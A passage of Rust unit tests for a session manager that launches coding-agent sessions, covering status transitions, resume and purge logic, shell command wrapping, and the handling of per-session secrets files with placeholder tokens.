assert_eq!(fetched.status, SessionStatus::Lost);
}
#[tokio::test]
async fn test_get_session_idle_with_alive_backend_stays_idle() {
let (mgr, _, _pool) = test_manager(MockBackend::new().with_alive(true)).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
mgr.store()
.update_session_status(&session.id.to_string(), SessionStatus::Idle)
.await
.unwrap();
let fetched = mgr
.get_session(&session.id.to_string())
.await
.unwrap()
.unwrap();
assert_eq!(fetched.status, SessionStatus::Idle);
}
#[tokio::test]
async fn test_list_sessions_idle_with_dead_backend_transitions_to_lost() {
let (mgr, _, _pool) = test_manager(MockBackend::new().with_alive(false)).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
mgr.store()
.update_session_status(&session.id.to_string(), SessionStatus::Idle)
.await
.unwrap();
let sessions = mgr.list_sessions().await.unwrap();
assert_eq!(sessions[0].status, SessionStatus::Lost);
}
#[tokio::test]
async fn test_get_session_not_found() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let result = mgr.get_session("nonexistent").await.unwrap();
assert!(result.is_none());
}
#[tokio::test]
async fn test_list_sessions_with_mixed_status() {
let (mgr, _, _pool) = test_manager(MockBackend::new().with_alive(false)).await;
let s1 = mgr.create_session(make_req("first")).await.unwrap();
let sessions = mgr.list_sessions().await.unwrap();
assert_eq!(sessions.len(), 1);
assert_eq!(sessions[0].id, s1.id);
assert_eq!(sessions[0].status, SessionStatus::Lost);
}
#[tokio::test]
async fn test_stop_session() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
mgr.stop_session(&session.id.to_string(), false)
.await
.unwrap();
let fetched = mgr
.get_session(&session.id.to_string())
.await
.unwrap()
.unwrap();
assert_eq!(fetched.status, SessionStatus::Stopped);
}
#[tokio::test]
async fn test_stop_session_with_purge() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let id = session.id.to_string();
mgr.stop_session(&id, true).await.unwrap();
let fetched = mgr.get_session(&id).await.unwrap();
assert!(fetched.is_none());
}
#[tokio::test]
async fn test_stop_session_not_found() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let result = mgr.stop_session("nonexistent", false).await;
assert!(result.is_err());
assert!(
result
.unwrap_err()
.to_string()
.contains("session not found")
);
}
#[tokio::test]
async fn test_stop_session_backend_error_recovers_by_name() {
let (mgr, _, _pool) = test_manager(MockBackend::new().with_kill_error()).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let result = mgr.stop_session(&session.id.to_string(), false).await;
assert!(result.is_ok(), "stop should succeed via name fallback");
}
#[tokio::test]
async fn test_capture_output() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let output = mgr.capture_output("some-id", "my-session", 100);
assert_eq!(output, "test output");
}
#[tokio::test]
async fn test_capture_output_falls_back_to_log() {
let backend = MockBackend::new();
*backend.captured_output.lock().unwrap() = String::new();
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let data_dir = tmpdir.path().to_str().unwrap();
let store = Store::new(data_dir).await.unwrap();
store.migrate().await.unwrap();
let log_dir = format!("{data_dir}/logs");
std::fs::create_dir_all(&log_dir).unwrap();
std::fs::write(
format!("{log_dir}/test-id.log"),
"line 1\nline 2\nline 3\nline 4\nline 5\n",
)
.unwrap();
let fc = FailCapture;
assert!(fc.create_session("n", "d", "c").is_ok());
assert!(fc.kill_session("n").is_ok());
assert!(fc.is_alive("n").unwrap());
assert!(fc.capture_output("n", 10).is_err());
assert!(fc.send_input("n", "t").is_ok());
assert!(fc.setup_logging("n", "p").is_ok());
let mgr = SessionManager::new(Arc::new(FailCapture), store, HashMap::new(), None);
let output = mgr.capture_output("test-id", "whatever", 3);
assert_eq!(output, "line 3\nline 4\nline 5");
}
#[tokio::test]
async fn test_read_log_tail_missing_file() {
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let mgr = SessionManager::new(
Arc::new(MockBackend::new()) as Arc<dyn Backend>,
store,
HashMap::new(),
None,
);
let output = mgr.read_log_tail("nonexistent", 10);
assert!(output.is_empty());
}
#[tokio::test]
async fn test_send_input() {
let (mgr, backend, _pool) = test_manager(MockBackend::new()).await;
mgr.send_input("my-session", "hello").unwrap();
let calls = backend.calls.lock().unwrap();
assert!(
calls
.iter()
.any(|c| c.contains("send_input:my-session:hello"))
);
drop(calls);
}
#[tokio::test]
async fn test_create_session_store_insert_failure() {
let (mgr, _, pool) = test_manager(MockBackend::new()).await;
sqlx::query("DROP TABLE sessions")
.execute(&pool)
.await
.unwrap();
let result = mgr.create_session(make_req("test")).await;
assert!(result.is_err());
}
#[tokio::test]
async fn test_list_sessions_store_failure() {
let (mgr, _, pool) = test_manager(MockBackend::new()).await;
sqlx::query("DROP TABLE sessions")
.execute(&pool)
.await
.unwrap();
let result = mgr.list_sessions().await;
assert!(result.is_err());
}
#[tokio::test]
async fn test_get_session_store_failure() {
let (mgr, _, pool) = test_manager(MockBackend::new()).await;
sqlx::query("DROP TABLE sessions")
.execute(&pool)
.await
.unwrap();
let result = mgr.get_session("test").await;
assert!(result.is_err());
}
#[tokio::test]
async fn test_stop_session_store_failure() {
let (mgr, _, pool) = test_manager(MockBackend::new()).await;
sqlx::query("DROP TABLE sessions")
.execute(&pool)
.await
.unwrap();
let result = mgr.stop_session("test", false).await;
assert!(result.is_err());
}
#[test]
fn test_validate_workdir_ok() {
assert!(validate_workdir("/tmp").is_ok());
}
#[test]
fn test_validate_workdir_missing() {
let err = validate_workdir("/nonexistent/path")
.unwrap_err()
.to_string();
assert!(err.contains("does not exist"), "got: {err}");
}
#[test]
fn test_validate_workdir_is_file() {
let tmp = tempfile::NamedTempFile::new().unwrap();
let path = tmp.path().to_str().unwrap();
let err = validate_workdir(path).unwrap_err().to_string();
assert!(err.contains("not a directory"), "got: {err}");
}
#[tokio::test]
async fn test_resume_stale_session() {
let (mgr, backend, _pool) = test_manager(MockBackend::new().with_alive(false)).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let fetched = mgr
.get_session(&session.id.to_string())
.await
.unwrap()
.unwrap();
assert_eq!(fetched.status, SessionStatus::Lost);
*backend.alive.lock().unwrap() = true;
backend.calls.lock().unwrap().clear();
let resumed = mgr.resume_session(&session.id.to_string()).await.unwrap();
assert_eq!(resumed.status, SessionStatus::Active);
let calls: Vec<_> = backend.calls.lock().unwrap().clone();
assert!(
!calls.iter().any(|c| c.starts_with("create:")),
"should not recreate backend session when alive; calls: {calls:?}"
);
}
#[tokio::test]
async fn test_resume_stale_session_recreates_when_backend_dead() {
let (mgr, backend, _pool) = test_manager(MockBackend::new().with_alive(false)).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let _ = mgr
.get_session(&session.id.to_string())
.await
.unwrap()
.unwrap();
backend.calls.lock().unwrap().clear();
let resumed = mgr.resume_session(&session.id.to_string()).await.unwrap();
assert_eq!(resumed.status, SessionStatus::Active);
let calls: Vec<_> = backend.calls.lock().unwrap().clone();
assert!(
calls.iter().any(|c| c.starts_with("create:")),
"should recreate backend session when dead; calls: {calls:?}"
);
}
#[tokio::test]
async fn test_resume_non_stale_session_fails() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let result = mgr.resume_session(&session.id.to_string()).await;
assert!(result.is_err());
assert!(
result
.unwrap_err()
.to_string()
.contains("cannot be resumed")
);
}
#[tokio::test]
async fn test_resume_nonexistent_session() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let result = mgr.resume_session("nonexistent").await;
assert!(result.is_err());
assert!(result.unwrap_err().to_string().contains("not found"));
}
#[tokio::test]
async fn test_resume_name_collision_rejected() {
let (mgr, _, pool) = test_manager(MockBackend::new().with_alive(false)).await;
let old = mgr.create_session(make_req("dup")).await.unwrap();
let old_id = old.id.to_string();
sqlx::query("UPDATE sessions SET status = 'lost' WHERE id = ?")
.bind(&old_id)
.execute(&pool)
.await
.unwrap();
mgr.create_session(make_req("dup")).await.unwrap();
let err = mgr.resume_session(&old_id).await.unwrap_err();
assert!(err.to_string().contains("already active"), "{err}");
}
#[tokio::test]
async fn test_resume_backend_failure() {
let backend = MockBackend::new().with_alive(false);
let (mgr, backend_ref, _pool) = test_manager(backend).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let id = session.id.to_string();
let _ = mgr.get_session(&id).await.unwrap();
*backend_ref.create_result.lock().unwrap() = Err(anyhow!("backend not found"));
let result = mgr.resume_session(&id).await;
assert!(result.is_err());
}
#[tokio::test]
async fn test_resume_ready_session_does_not_self_collide() {
let (mgr, _, pool) = test_manager(MockBackend::new().with_alive(false)).await;
let session = mgr.create_session(make_req("ready-test")).await.unwrap();
let id = session.id.to_string();
sqlx::query("UPDATE sessions SET status = 'ready' WHERE id = ?")
.bind(&id)
.execute(&pool)
.await
.unwrap();
let resumed = mgr.resume_session(&id).await.unwrap();
assert_eq!(resumed.status, SessionStatus::Active);
}
#[test]
fn test_wrap_command_basic() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("echo hello", &id, "test-session", None);
assert!(cmd.contains("-l -c"));
assert!(cmd.contains("echo hello"));
assert!(cmd.contains("[pulpo] Agent exited (session: test-session)"));
assert!(cmd.contains("Run: pulpo resume test-session"));
assert!(cmd.contains("exec "));
assert!(cmd.contains(" -l'"));
assert!(cmd.contains(&format!("PULPO_SESSION_ID={id}")));
assert!(cmd.contains("PULPO_SESSION_NAME=test-session"));
}
#[test]
fn test_wrap_command_single_quotes() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("claude -p 'Fix the bug'", &id, "my-task", None);
assert!(cmd.contains("-l -c"));
assert!(cmd.contains("claude -p"));
assert!(cmd.contains("Fix the bug"));
assert!(cmd.contains("PULPO_SESSION_ID="));
assert!(cmd.contains("PULPO_SESSION_NAME=my-task"));
assert!(cmd.contains("(session: my-task)"));
assert!(cmd.contains("Run: pulpo resume my-task"));
}
#[test]
fn test_wrap_command_quoting_is_valid_shell() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("claude", &id, "test-session", None);
let simplified = cmd.replace("'\\''", "X");
let quote_count = simplified.chars().filter(|&c| c == '\'').count();
assert_eq!(
quote_count % 2,
0,
"unbalanced single quotes in wrapped command: {cmd}"
);
}
#[test]
fn test_wrap_command_executes_without_parse_error() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("true", &id, "test-session", None);
let output = std::process::Command::new("sh")
.args(["-n", "-c", &cmd])
.output()
.expect("failed to spawn shell");
let stderr = String::from_utf8_lossy(&output.stderr);
assert!(
output.status.success(),
"wrapped command has shell syntax errors:\n command: {cmd}\n stderr: {stderr}"
);
}
#[test]
fn test_wrap_command_with_quotes_executes_without_parse_error() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("echo 'hello world'", &id, "quoted-session", None);
let output = std::process::Command::new("sh")
.args(["-n", "-c", &cmd])
.output()
.expect("failed to spawn shell");
let stderr = String::from_utf8_lossy(&output.stderr);
assert!(
output.status.success(),
"wrapped command with quotes has shell syntax errors:\n command: {cmd}\n stderr: {stderr}"
);
}
#[test]
fn test_is_shell_command() {
assert!(is_shell_command("bash"));
assert!(is_shell_command("zsh"));
assert!(is_shell_command("sh"));
assert!(is_shell_command("fish"));
assert!(is_shell_command("nu"));
assert!(is_shell_command("/bin/bash"));
assert!(is_shell_command("/usr/bin/zsh"));
assert!(!is_shell_command("claude"));
assert!(!is_shell_command("claude -p 'fix'"));
assert!(!is_shell_command("npm run lint"));
assert!(!is_shell_command("bash -c 'echo hello'"));
}
#[test]
fn test_wrap_command_shell_no_exit_marker() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("bash", &id, "my-shell", None);
assert!(cmd.contains("exec bash"));
assert!(cmd.contains(&format!("PULPO_SESSION_ID={id}")));
assert!(cmd.contains("PULPO_SESSION_NAME=my-shell"));
assert!(!cmd.contains("[pulpo] Agent exited"));
assert!(!cmd.contains("Run: pulpo resume"));
}
#[test]
fn test_wrap_command_shell_with_path() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("/usr/bin/zsh", &id, "zsh-session", None);
assert!(cmd.contains("exec /usr/bin/zsh"));
assert!(!cmd.contains("[pulpo] Agent exited"));
}
#[test]
fn test_wrap_command_with_secrets_file() {
let id = uuid::Uuid::new_v4();
let secrets_path = "/tmp/pulpo-secrets-test.sh";
let cmd = wrap_command("echo hello", &id, "test", Some(secrets_path));
assert!(cmd.contains(". /tmp/pulpo-secrets-test.sh && rm -f /tmp/pulpo-secrets-test.sh"));
assert!(cmd.contains("echo hello"));
assert!(!cmd.contains("export GITHUB_TOKEN"));
}
#[test]
fn test_wrap_command_shell_with_secrets_file() {
let id = uuid::Uuid::new_v4();
let secrets_path = "/tmp/pulpo-secrets-shell.sh";
let cmd = wrap_command("bash", &id, "my-shell", Some(secrets_path));
assert!(cmd.contains(". /tmp/pulpo-secrets-shell.sh && rm -f /tmp/pulpo-secrets-shell.sh"));
assert!(cmd.contains("exec bash"));
}
#[test]
fn test_wrap_command_no_secrets_file() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("echo hello", &id, "test", None);
assert!(!cmd.contains(". /tmp/pulpo-secrets"));
assert!(!cmd.contains("rm -f"));
assert!(cmd.contains("echo hello"));
}
#[test]
fn test_write_secrets_file_empty() {
let tmpdir = tempfile::tempdir().unwrap();
let id = uuid::Uuid::new_v4();
let result =
write_secrets_file(&id, &HashMap::new(), tmpdir.path().to_str().unwrap()).unwrap();
assert!(result.is_none());
}
#[test]
fn test_write_secrets_file_creates_file() {
let tmpdir = tempfile::tempdir().unwrap();
let data_dir = tmpdir.path().to_str().unwrap();
let id = uuid::Uuid::new_v4();
let mut secrets = HashMap::new();
secrets.insert("GITHUB_TOKEN".to_owned(), "ghp_abc123".to_owned());
secrets.insert("NPM_TOKEN".to_owned(), "npm_xyz".to_owned());
let path = write_secrets_file(&id, &secrets, data_dir)
.unwrap()
.unwrap();
assert_eq!(path, format!("{data_dir}/secrets/secrets-{id}.sh"));
let content = std::fs::read_to_string(&path).unwrap();
assert!(content.contains("export GITHUB_TOKEN='ghp_abc123'"));
assert!(content.contains("export NPM_TOKEN='npm_xyz'"));
#[cfg(unix)]
{
use std::os::unix::fs::PermissionsExt;
let metadata = std::fs::metadata(&path).unwrap();
assert_eq!(metadata.permissions().mode() & 0o777, 0o600);
}
}
#[test]
fn test_write_secrets_file_escapes_single_quotes() {
let tmpdir = tempfile::tempdir().unwrap();
let data_dir = tmpdir.path().to_str().unwrap();
let id = uuid::Uuid::new_v4();
let mut secrets = HashMap::new();
secrets.insert("MY_KEY".to_owned(), "value'with'quotes".to_owned());
let path = write_secrets_file(&id, &secrets, data_dir)
.unwrap()
.unwrap();
let content = std::fs::read_to_string(&path).unwrap();
assert!(content.contains("export MY_KEY='value'\\''with'\\''quotes'"));
}
#[tokio::test]
async fn test_create_session_with_secrets() {
let (mgr, backend, _pool) = test_manager(MockBackend::new()).await;
mgr.store()
.set_secret("MY_TOKEN", "secret123")
.await
.unwrap();
mgr.store()
.set_secret_with_env("GH_WORK", "ghp_abc", Some("GITHUB_TOKEN"))
.await
.unwrap();
let mut req = make_req("secret-test");
req.secrets = Some(vec!["MY_TOKEN".into(), "GH_WORK".into()]);
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.status, SessionStatus::Active);
let calls = backend.calls.lock().unwrap();
let create_call = &calls[0];
assert!(
!create_call.contains("secret123"),
"secret value leaked into command: {create_call}"
);
assert!(
!create_call.contains("ghp_abc"),
"secret value leaked into command: {create_call}"
);
assert!(
create_call.contains("/secrets/secrets-"),
"command should source secrets file: {create_call}"
);
assert!(
create_call.contains("&& rm -f"),
"command should delete secrets file: {create_call}"
);
drop(calls);
let data_dir = mgr.store().data_dir();
let secrets_path = format!("{data_dir}/secrets/secrets-{}.sh", session.id);
let content = std::fs::read_to_string(&secrets_path).unwrap();
assert!(content.contains("export MY_TOKEN='secret123'"));
assert!(content.contains("export GITHUB_TOKEN='ghp_abc'"));
}
#[tokio::test]
async fn test_create_session_with_empty_secrets() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let mut req = make_req("empty-secrets");
req.secrets = Some(vec![]);
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.status, SessionStatus::Active);
}
#[tokio::test]
async fn test_create_session_emits_event() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let (event_tx, mut event_rx) = broadcast::channel(16);
let mgr = mgr.with_event_tx(event_tx, "test-node".into());
let _session = mgr.create_session(make_req("event-test")).await.unwrap();
let event = event_rx.recv().await.unwrap();
let se = unwrap_session_event(event);
assert_eq!(se.session_name, "event-test");
assert_eq!(se.status, "active");
assert_eq!(se.previous_status.as_deref(), Some("creating"));
assert_eq!(se.node_name, "test-node");
}
#[tokio::test]
async fn test_stop_session_emits_event() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let (event_tx, mut event_rx) = broadcast::channel(16);
let mgr = mgr.with_event_tx(event_tx, "test-node".into());
let session = mgr.create_session(make_req("stop-event")).await.unwrap();
let _ = event_rx.recv().await;
mgr.stop_session(&session.id.to_string(), false)
.await
.unwrap();
let event = event_rx.recv().await.unwrap();
let se = unwrap_session_event(event);
assert_eq!(se.status, "stopped");
}
#[tokio::test]
async fn test_stop_session_purge_emits_deleted_event() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let (event_tx, mut event_rx) = broadcast::channel(16);
let mgr = mgr.with_event_tx(event_tx, "test-node".into());
let session = mgr.create_session(make_req("purge-event")).await.unwrap();
let _ = event_rx.recv().await;
mgr.stop_session(&session.id.to_string(), true)
.await
.unwrap();
let stopped = event_rx.recv().await.unwrap();
let deleted = event_rx.recv().await.unwrap();
let stopped = unwrap_session_event(stopped);
assert_eq!(stopped.status, "stopped");
match deleted {
PulpoEvent::SessionDeleted(se) => {
assert_eq!(se.session_id, session.id.to_string());
assert_eq!(se.session_name, "purge-event");
assert_eq!(se.node_name, "test-node");
}
PulpoEvent::Session(_) => panic!("expected session_deleted event"),
}
}
#[tokio::test]
async fn test_stop_session_purge_active_succeeds() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let id = session.id.to_string();
mgr.stop_session(&id, true).await.unwrap();
let fetched = mgr.get_session(&id).await.unwrap();
assert!(fetched.is_none());
}
#[tokio::test]
async fn test_stop_session_purge_not_found() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let result = mgr.stop_session("nonexistent", true).await;
assert!(result.is_err());
assert!(result.unwrap_err().to_string().contains("not found"));
}
#[tokio::test]
async fn test_resolve_backend_id_with_stored() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let backend_id = mgr.resolve_backend_id(&session);
assert_eq!(backend_id, "$4");
}
#[tokio::test]
async fn test_resolve_ink_no_command_no_ink_falls_back_to_shell() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
name: "test".into(),
workdir: Some("/tmp".into()),
command: None,
ink: None,
description: Some("desc".into()),
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let resolved = mgr.resolve_ink(&req).unwrap();
assert!(!resolved.command.is_empty());
assert_eq!(resolved.description, Some("desc".into()));
}
#[tokio::test]
async fn test_ink_description_fallback() {
let mut inks = HashMap::new();
inks.insert(
"test-ink".into(),
InkConfig {
description: Some("Ink desc".into()),
command: Some("echo test".into()),
..InkConfig::default()
},
);
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let backend = Arc::new(MockBackend::new());
let mgr = SessionManager::new(backend, store, inks, None).with_no_stale_grace();
let req = CreateSessionRequest {
name: "fallback-test".into(),
workdir: Some("/tmp".into()),
command: None,
ink: Some("test-ink".into()),
description: None, metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.description, Some("Ink desc".into()));
}
#[tokio::test]
async fn test_ink_with_no_command_falls_back_to_shell() {
let mut inks = HashMap::new();
inks.insert(
"empty-ink".into(),
InkConfig {
description: Some("Empty".into()),
command: None,
..InkConfig::default()
},
);
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let backend = Arc::new(MockBackend::new());
let mgr = SessionManager::new(backend, store, inks, None).with_no_stale_grace();
let req = CreateSessionRequest {
name: "empty-test".into(),
workdir: Some("/tmp".into()),
command: None,
ink: Some("empty-ink".into()),
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert!(!session.command.is_empty());
}
#[tokio::test]
async fn test_create_session_uses_default_command() {
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let backend = Arc::new(MockBackend::new());
let mgr = SessionManager::new(backend, store, HashMap::new(), Some("claude".into()))
.with_no_stale_grace();
let req = CreateSessionRequest {
name: "default-cmd-test".into(),
workdir: Some("/tmp".into()),
command: None,
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.command, "claude");
}
#[tokio::test]
async fn test_create_session_explicit_command_overrides_default() {
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let backend = Arc::new(MockBackend::new());
let mgr = SessionManager::new(backend, store, HashMap::new(), Some("claude".into()))
.with_no_stale_grace();
let req = CreateSessionRequest {
name: "explicit-cmd-test".into(),
workdir: Some("/tmp".into()),
command: Some("custom-agent".into()),
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.command, "custom-agent");
}
#[tokio::test]
async fn test_create_session_ink_overrides_default_command() {
let mut inks = HashMap::new();
inks.insert(
"coder".into(),
InkConfig {
description: Some("Coder ink".into()),
command: Some("claude -p 'implement'".into()),
..InkConfig::default()
},
);
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let backend = Arc::new(MockBackend::new());
let mgr = SessionManager::new(backend, store, inks, Some("default-agent".into()))
.with_no_stale_grace();
let req = CreateSessionRequest {
name: "ink-over-default".into(),
workdir: Some("/tmp".into()),
command: None,
ink: Some("coder".into()),
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.command, "claude -p 'implement'");
}
#[tokio::test]
async fn test_ink_provides_runtime() {
let mut inks = HashMap::new();
inks.insert(
"sandbox-coder".into(),
InkConfig {
description: Some("Docker coder".into()),
command: Some("claude".into()),
runtime: Some("docker".into()),
..InkConfig::default()
},
);
let docker = Arc::new(MockBackend::new());
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let mgr = SessionManager::new(Arc::new(MockBackend::new()), store, inks, None)
.with_docker_backend(docker)
.with_no_stale_grace();
let req = CreateSessionRequest {
name: "ink-rt".into(),
workdir: Some("/tmp".into()),
command: None,
ink: Some("sandbox-coder".into()),
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None, secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.runtime, Runtime::Docker);
}
#[tokio::test]
async fn test_ink_runtime_overridden_by_request() {
let mut inks = HashMap::new();
inks.insert(
"docker-ink".into(),
InkConfig {
command: Some("claude".into()),
runtime: Some("docker".into()),
..InkConfig::default()
},
);
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let mgr = SessionManager::new(Arc::new(MockBackend::new()), store, inks, None)
.with_no_stale_grace();
let req = CreateSessionRequest {
name: "override-rt".into(),
workdir: Some("/tmp".into()),
command: None,
ink: Some("docker-ink".into()),
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: Some(Runtime::Tmux), secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.runtime, Runtime::Tmux);
}
#[tokio::test]
async fn test_ink_secrets_merged_with_request_secrets() {
let mut inks = HashMap::new();
inks.insert(
"coder-with-secrets".into(),
InkConfig {
command: Some("claude".into()),
secrets: vec!["INK_SECRET".into()],
..InkConfig::default()
},
);
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
store.set_secret("INK_SECRET", "ink-value").await.unwrap();
store.set_secret("REQ_SECRET", "req-value").await.unwrap();
let backend = Arc::new(MockBackend::new());
let mgr = SessionManager::new(backend.clone(), store, inks, None).with_no_stale_grace();
let req = CreateSessionRequest {
name: "merged-secrets".into(),
workdir: Some("/tmp".into()),
command: None,
ink: Some("coder-with-secrets".into()),
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: Some(vec!["REQ_SECRET".into()]),
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
let calls: Vec<_> = backend.calls.lock().unwrap().clone();
let create_call = calls.iter().find(|c| c.starts_with("create:")).unwrap();
assert!(
!create_call.contains("ink-value"),
"ink secret value leaked into command: {create_call}"
);
assert!(
!create_call.contains("req-value"),
"request secret value leaked into command: {create_call}"
);
assert!(
create_call.contains("/secrets/secrets-"),
"command should source secrets file: {create_call}"
);
let data_dir = mgr.store().data_dir();
let secrets_path = format!("{data_dir}/secrets/secrets-{}.sh", session.id);
let content = std::fs::read_to_string(&secrets_path).unwrap();
assert!(
content.contains("INK_SECRET"),
"ink secret should be in file: {content}"
);
assert!(
content.contains("REQ_SECRET"),
"request secret should be in file: {content}"
);
}
#[test]
fn test_write_secrets_file_path_includes_session_id() {
let tmpdir = tempfile::tempdir().unwrap();
let data_dir = tmpdir.path().to_str().unwrap();
let id = uuid::Uuid::new_v4();
let mut secrets = HashMap::new();
secrets.insert("KEY".to_owned(), "val".to_owned());
let path = write_secrets_file(&id, &secrets, data_dir)
.unwrap()
.unwrap();
assert!(
path.contains(&id.to_string()),
"path should contain session ID: {path}"
);
assert_eq!(path, format!("{data_dir}/secrets/secrets-{id}.sh"));
}
#[test]
fn test_write_secrets_file_content_format() {
let tmpdir = tempfile::tempdir().unwrap();
let data_dir = tmpdir.path().to_str().unwrap();
let id = uuid::Uuid::new_v4();
let mut secrets = HashMap::new();
secrets.insert("MY_VAR".to_owned(), "hello world".to_owned());
let path = write_secrets_file(&id, &secrets, data_dir)
.unwrap()
.unwrap();
let content = std::fs::read_to_string(&path).unwrap();
assert!(content.contains("export MY_VAR='hello world'\n"));
}
#[test]
fn test_write_secrets_file_escapes_multiple_single_quotes() {
let tmpdir = tempfile::tempdir().unwrap();
let data_dir = tmpdir.path().to_str().unwrap();
let id = uuid::Uuid::new_v4();
let mut secrets = HashMap::new();
secrets.insert("K".to_owned(), "a'b'c".to_owned());
let path = write_secrets_file(&id, &secrets, data_dir)
.unwrap()
.unwrap();
let content = std::fs::read_to_string(&path).unwrap();
assert!(content.contains("export K='a'\\''b'\\''c'"));
}
#[test]
fn test_wrap_command_secrets_source_before_env_vars() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("echo test", &id, "sess", Some("/tmp/secrets.sh"));
let source_pos = cmd.find(". /tmp/secrets.sh").unwrap();
let env_pos = cmd.find("PULPO_SESSION_ID").unwrap();
assert!(
source_pos < env_pos,
"secrets should be sourced before env vars: {cmd}"
);
}
#[test]
fn test_wrap_command_secrets_source_and_delete_pattern() {
let id = uuid::Uuid::new_v4();
let path = "/tmp/pulpo-secrets-test.sh";
let cmd = wrap_command("my-agent", &id, "sess", Some(path));
assert!(cmd.contains(&format!(". {path} && rm -f {path}; ")));
}
#[tokio::test]
async fn test_create_session_with_missing_secret_names() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let mut req = make_req("missing-secrets");
req.secrets = Some(vec!["NONEXISTENT_SECRET".into()]);
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.status, SessionStatus::Active);
}
#[tokio::test]
async fn test_create_session_secret_env_collision() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
mgr.store()
.set_secret("GITHUB_TOKEN", "val1")
.await
.unwrap();
mgr.store()
.set_secret_with_env("GH_WORK", "val2", Some("GITHUB_TOKEN"))
.await
.unwrap();
let mut req = make_req("collision-test");
